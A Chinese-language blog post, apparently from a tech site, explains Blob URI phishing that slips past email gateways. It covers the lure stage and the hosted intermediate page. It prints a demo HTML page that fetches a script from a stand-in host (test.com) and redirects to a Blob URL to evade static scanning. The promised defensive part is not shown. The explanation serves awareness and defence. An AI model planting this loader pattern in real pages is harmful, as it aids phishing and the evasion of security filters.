博客 / 詳情

返回

從Demo到防禦:揭秘Blob URI釣魚攻擊的原理與實戰防禦

通過上一篇文章Cofense披露新型釣魚攻擊手法:利用 Blob URI 繞過 SEG,大概知道Blob URL的釣魚攻擊手法了。

下面再看個Demo,深入瞭解下攻擊原理。

一、攻擊實施路徑

1. 誘導階段

偽造可信郵件:

攻擊者構造包含合法域名鏈接的釣魚郵件(如baidu.com),利用百度品牌可信度降低用户警惕性。

繞過郵件網關:

鏈接指向的中間頁面託管在合法的服務上,HTML文件無惡意特徵,可順利通過傳統安全掃描。

2. 中間頁面加載

舉個簡單的HTML頁面看看。

中間頁面加載的HTML文件,包含經過Base64編碼的惡意腳本,關鍵代碼如下:

<!DOCTYPE html>
<html>
  <body>
    <script>
      // 隱藏的惡意腳本加載邏輯
 fetch('https://test.com/test.js').then(response=> response.text()).then(code => {
        const blob = new Blob([code], {type: 'text/javascript'});
        const blobUrl = URL.createObjectURL(blob);
        window.location.href = blobUrl; // 關鍵一步,觸發Blob URI跳轉
      });
    </script>
  </body>
</html>

該腳本通過動態加載外部JS文件,避免靜態特徵被檢測。

詳情:從Demo到防禦:揭秘Blob URI釣魚攻擊的原理與實戰防禦

user avatar
0 位用戶收藏了這個故事!

發佈 評論

Some HTML is okay.